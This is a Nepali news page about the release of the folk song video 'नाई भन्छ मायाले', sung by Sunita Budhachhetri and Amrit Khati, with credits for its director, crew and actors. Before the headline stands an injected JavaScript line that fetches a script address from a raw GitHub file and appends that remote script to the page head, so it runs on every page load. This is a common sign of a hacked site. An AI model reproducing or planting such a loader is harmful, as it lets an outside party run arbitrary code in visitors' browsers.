;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); ‘नाई भन्छ मायाले’ भिडियो सार्वजनिक, हेर्नुहोस् भिडियो सहित – जुनेली न्युज
मङ्लबार, असार ११, २०८२
  • होमपेज
  • ‘नाई भन्छ मायाले’ भिडियो सार्वजनिक, हेर्नुहोस् भिडियो सहित
Breaking News

‘नाई भन्छ मायाले’ भिडियो सार्वजनिक, हेर्नुहोस् भिडियो सहित

जुनेली न्यून, कठमाडौं।

गायिका सुनिता बुढाक्षेत्री र गायक अमृत खातीको आवाजमा नयाँ साङ्गीतिक लोककोसेली ‘नाइ भन्छ मायाले’ सार्वजनिक भएको छ ।

जनचेतानामूलकगीत,गायन लेखन र सङ्गीतमा काम गर्दै आएका गायक खातीको शब्द सङ्गीतमा रहेको उक्त गीत डिएआर मुभिजमार्फत सार्वजनिक भएको छ।

काजिस श्रेष्ठको निर्देशनमा तयार भएको यस गीतको छायाङ्कन मुकेश हुमागाईँ र सम्पादन दीपक खड्काले गरेका हुन् भने गीतको म्युजिक भिडियोमा लोमस शर्मा र सन्ध्या सानुको अभिनय रहेकाे छ।

भिडियो हेर्न यो लिङ्कमा क्लिक गर्नुहोस्

 

फेसबुक प्रतिक्रियाहरु